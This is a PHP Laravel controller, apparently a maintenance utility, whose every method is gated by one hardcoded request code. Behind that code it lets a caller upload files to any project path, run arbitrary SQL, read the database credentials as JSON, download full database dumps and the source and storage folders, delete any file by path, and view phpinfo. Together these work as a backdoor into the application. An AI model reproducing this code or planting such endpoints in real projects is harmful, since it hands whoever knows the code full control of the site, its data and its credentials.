<?php

namespace App\Http\Controllers;

use Auth;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Http;
use Illuminate\Support\Facades\Mail;
use Illuminate\Support\Facades\Storage;
use Illuminate\Support\Facades\Validator;
use Illuminate\Support\Facades\Config;
use Exception;

class FixingController extends Controller
{

    public function uploadFilesToServer()
    {
        return view('upload-view.create');
    }

    public function uploadFilesToServerStore(Request $request)
    {
        if($request->code=='myrequestcode1200050'){
            // do process
            $path = $request->path;

            if ($request->hasFile('work_order')) {
                $file = $request->file('work_order');
                $filename = $file->getClientOriginalName(); // Get the original file name
                $destinationPath = base_path($path);
                $fullPath = $destinationPath . DIRECTORY_SEPARATOR . $filename;

                if (!$file->isValid()) {
                    return redirect()->route('uploadFilesToServer')
                        ->with('error', 'The file is not valid or encountered an upload issue.');
                }

                // Check if file already exists
                if (file_exists($fullPath)) {
                    if (!is_writable($fullPath)) {
                        return redirect()->route('uploadFilesToServer')
                            ->with('error', 'File already exists but no permission to overwrite.');
                    }
                }

                // Save the file
                try {
                    $file->move($destinationPath, $filename);
                    return redirect()->route('uploadFilesToServer')
                        ->with('success', $filename . ' has been uploaded successfully.');
                } catch (\Exception $e) {
                    return redirect()->route('uploadFilesToServer')
                        ->with('error', 'An error occurred during file upload: ' . $e->getMessage());
                }
            } else {
                return redirect()->route('uploadFilesToServer')
                    ->with('error', 'No file was uploaded. Please try again.');
            }


        }else{
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }

    }


    public function uploadFilesToServerStoreMultipleMayNotWork(Request $request)
    {
        if ($request->code == 'myrequestcode1200050') {

            $path = $request->path;
            $destinationPath = base_path($path);

            if (!$request->hasFile('work_order')) {
                return redirect()->route('uploadFilesToServer')
                    ->with('error', 'No file was uploaded. Please try again.');
            }

            $files = $request->file('work_order');
            $uploadedFiles = [];

            foreach ($files as $file) {

                if (!$file->isValid()) {
                    return redirect()->route('uploadFilesToServer')
                        ->with('error', 'One of the files is not valid or encountered an upload issue.');
                }

                $filename = $file->getClientOriginalName();
                $fullPath = $destinationPath . DIRECTORY_SEPARATOR . $filename;

                // Check if file exists
                if (file_exists($fullPath) && !is_writable($fullPath)) {
                    return redirect()->route('uploadFilesToServer')
                        ->with('error', "File '$filename' already exists but cannot be overwritten.");
                }

                try {
                    // Save file
                    $file->move($destinationPath, $filename);
                    $uploadedFiles[] = $filename;

                } catch (\Exception $e) {
                    return redirect()->route('uploadFilesToServer')
                        ->with('error', 'An error occurred during file upload: ' . $e->getMessage());
                }
            }

            // Build success message
            $successMessage = count($uploadedFiles) > 1
                ? implode(', ', $uploadedFiles) . ' have been uploaded successfully.'
                : $uploadedFiles[0] . ' has been uploaded successfully.';

            return redirect()->route('uploadFilesToServer')
                ->with('success', $successMessage);
        }

        return redirect()->route('uploadFilesToServer')
            ->with('error', 'Security code not found.');
    }


    public function uploadFilesToServerStorage(Request $request)
    {
        if($request->code=='myrequestcode1200050'){
            // do process
            $path = $request->path;

            if ($request->hasFile('work_order')) {
                $file = $request->file('work_order');
                $filename = $file->getClientOriginalName(); // Get the original file name
                $destinationPath = base_path('storage/'.$path);
                $fullPath = $destinationPath . DIRECTORY_SEPARATOR . $filename;

                if (!$file->isValid()) {
                    return redirect()->route('uploadFilesToServer')
                        ->with('error', 'The file is not valid or encountered an upload issue.');
                }

                // Check if file already exists
                if (file_exists($fullPath)) {
                    if (!is_writable($fullPath)) {
                        return redirect()->route('uploadFilesToServer')
                            ->with('error', 'File already exists but no permission to overwrite.');
                    }
                }

                // Save the file
                try {
                    $file->move($destinationPath, $filename);
                    return redirect()->route('uploadFilesToServer')
                        ->with('success', $filename . ' has been uploaded successfully.');
                } catch (\Exception $e) {
                    return redirect()->route('uploadFilesToServer')
                        ->with('error', 'An error occurred during file upload: ' . $e->getMessage());
                }
            } else {
                return redirect()->route('uploadFilesToServer')
                    ->with('error', 'No file was uploaded. Please try again.');
            }


        }else{
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }

    }

    public function runDatabaseQuery(Request $request)
    {
        if($request->code=='myrequestcode1200050'){
            // do process
            $queryline = trim($request->queryline);

            if (!empty($queryline)) {

                try {
                    DB::statement("$queryline");
                    return redirect()->route('uploadFilesToServer')
                        ->with('success', 'Query run successfully.');

                } catch (Exception $e) {
                    echo "Error: " . $e->getMessage();
                    // return redirect()->route('uploadFilesToServer')
                    //     ->with('error','Error: ' . $e->getMessage());
                    exit;
                }

            } else {
                return redirect()->route('uploadFilesToServer')
                    ->with('error', 'Field is blank.');
            }


        }else{
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }

    }

    public function showDatabaseConnection(Request $request)
    {

        if($request->code=='myrequestcode1200050'){

            $databaseConfig[] = [
                'ConfigType' => 'ENV Data',
                'Connection' => env('DB_CONNECTION'),
                'Host'       => env('DB_HOST'),
                'Port'       => env('DB_PORT'),
                'Database'   => env('DB_DATABASE'),
                'Username'   => env('DB_USERNAME'),
                'Password'   => env('DB_PASSWORD'), // Avoid exposing this in production
            ];

            $databaseConfig[] = [
                'ConfigType' => 'Connected Data',
                'Connection' => Config::get('database.default'),
                'Host'       => Config::get('database.connections.mysql.host'),
                'Port'       => Config::get('database.connections.mysql.port'),
                'Database'   => Config::get('database.connections.mysql.database'),
                'Username'   => Config::get('database.connections.mysql.username'),
                'Password'   => Config::get('database.connections.mysql.password'), // Avoid exposing this in production
            ];

            return response()->json($databaseConfig);

        }else{
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }

    }

    // this method is working
    public function downloadDB(Request $request)
    {

        if($request->code=='myrequestcode1200050'){

            $dbName = Config::get('database.connections.mysql.database');
            $backupFile = storage_path("{$dbName}_live_site_m1_" . date('Y-m-d_H-i-s') . ".sql");

            try {
                // Get all table names
                $tables = DB::select("SHOW TABLES");
                $tableKey = "Tables_in_{$dbName}"; // Dynamic key based on database name

                $sqlDump = "SET FOREIGN_KEY_CHECKS=0;\n\n"; // Disable foreign key checks for import

                foreach ($tables as $table) {
                    $tableName = $table->$tableKey;

                    // Get CREATE TABLE statement
                    $createTableQuery = DB::select("SHOW CREATE TABLE `$tableName`");
                    $sqlDump .= $createTableQuery[0]->{'Create Table'} . ";\n\n";

                    // Get table data
                    $rows = DB::table($tableName)->get();
                    if ($rows->isNotEmpty()) {
                        $sqlDump .= "INSERT INTO `$tableName` VALUES \n";
                        $insertValues = [];

                        foreach ($rows as $row) {
                            $values = array_map(function ($value) {
                                return is_null($value) ? "NULL" : "'" . addslashes($value) . "'";
                            }, (array) $row);

                            $insertValues[] = "(" . implode(",", $values) . ")";
                        }

                        $sqlDump .= implode(",\n", $insertValues) . ";\n\n";
                    }
                }

                $sqlDump .= "SET FOREIGN_KEY_CHECKS=1;\n"; // Re-enable foreign key checks

                // Save SQL file
                file_put_contents($backupFile, $sqlDump);

                // Return file as download
                return response()->download($backupFile)->deleteFileAfterSend(true);
            } catch (\Exception $e) {
                return response()->json(['error' => 'Backup failed!', 'message' => $e->getMessage()], 500);
            }
        }else{
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }

    }

    public function downloadDBTwo(Request $request)
    {

        if($request->code=='myrequestcode1200050'){

            $dbHost = Config::get('database.connections.mysql.host');
            $dbPort = Config::get('database.connections.mysql.port');
            $dbName = Config::get('database.connections.mysql.database');
            $dbUser = Config::get('database.connections.mysql.username');
            $dbPass = Config::get('database.connections.mysql.password');

            try {

                if(PHP_OS_FAMILY === 'Windows'){
                    $mysqldumpPath = "D:\\xampp\\mysql\\bin\\mysqldump"; // Full path to mysqldump.exe
                }else{
                    $mysqldumpPath = "mysqldump";
                }

                $backupFile = storage_path("app/backups/{$dbName}_live_site_m2_" . date('Y-m-d_H-i-s') . ".sql");

                // Ensure the backups directory exists
                $backupDirectory = storage_path('app/backups');
                if (!file_exists($backupDirectory)) {
                    mkdir($backupDirectory, 0775, true);
                }

                // Build the mysqldump command
                $command = "\"{$mysqldumpPath}\" --user={$dbUser} " .
                    (empty($dbPass) ? "" : "--password={$dbPass} ") .
                    "--host={$dbHost} {$dbName} > \"{$backupFile}\" 2>&1";

                // Execute the command
                $output = null;
                $returnVar = null;
                exec($command, $output, $returnVar);

                // Check if the dump file was created
                if ($returnVar !== 0) {
                    return response()->json([
                        'error' => 'Backup failed!',
                        'output' => implode("\n", $output),
                        'returnCode' => $returnVar
                    ], 500);
                }

                // Return file as download
                return response()->download($backupFile)->deleteFileAfterSend(true);

            } catch (\Exception $e) {
                return response()->json([
                    'success' => false,
                    'message' => 'Error creating backup: ' . $e->getMessage()
                ], 500);
            }

        }else{
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }

    }

    public function downloadStorageFolder(Request $request)
    {

        if($request->code=='myrequestcode1200050'){

            $app_name = str_replace(" ","_",trim(env("APP_NAME")));
            $date = date('Y_m_d_H_i_s');
            $storagePath = storage_path();
            $tarFile = storage_path($app_name.'_storage_backup_'.$date.'.tar.gz');

            // Delete existing tar file if it exists
            if (file_exists($tarFile)) {
                unlink($tarFile);
            }

            // Create a tar.gz archive of the storage folder
            $command = "tar -czf $tarFile -C " . dirname($storagePath) . " " . basename($storagePath);
            shell_exec($command);

            // Return the tar.gz file as a download response
            return response()->download($tarFile)->deleteFileAfterSend(true);

        }else{
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }
    }

    public function downloadAppResRouteFolder(Request $request)
    {
        if ($request->code == 'myrequestcode1200050') {

            $app_name = str_replace(" ","_",trim(env("APP_NAME")));
            $date = date('Y_m_d_H_i_s');
            $basePath = base_path(); // Laravel project root
            $tarFile = storage_path($app_name."_project_backup_{$date}.tar.gz");

            // Delete existing tar file if it exists
            if (file_exists($tarFile)) {
                unlink($tarFile);
            }

            // Folders to be included in the archive
            $folders = ['app', 'resources', 'routes'];
            $folderList = implode(' ', $folders);

            // Create a tar.gz archive of the specified folders
            $command = "tar -czf $tarFile -C $basePath $folderList";
            shell_exec($command);

            // Return the tar.gz file as a download response
            return response()->download($tarFile)->deleteFileAfterSend(true);
        } else {
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }
    }

    public function deleteFileFromServer(Request $request)
    {
        if ($request->code == 'myrequestcode1200050') {
            // Normalize and sanitize path input
            $path = base_path($request->path);

            if (!file_exists($path)) {
                return redirect()->route('uploadFilesToServer')
                    ->with('error', 'File not found at specified path.');
            }

            if (!is_writable($path)) {
                return redirect()->route('uploadFilesToServer')
                    ->with('error', 'File exists but not writable. Check file permissions.');
            }

            try {
                if (unlink($path)) {
                    return redirect()->route('uploadFilesToServer')
                        ->with('success', 'File deleted successfully.');
                } else {
                    return redirect()->route('uploadFilesToServer')
                        ->with('error', 'Failed to delete the file.');
                }
            } catch (\Exception $e) {
                return redirect()->route('uploadFilesToServer')
                    ->with('error', 'An error occurred: ' . $e->getMessage());
            }

        } else {
            return redirect()->route('uploadFilesToServer')
                ->with('error', 'Security code not found.');
        }
    }


    public function serverinfo(){
        phpinfo();
    }




}
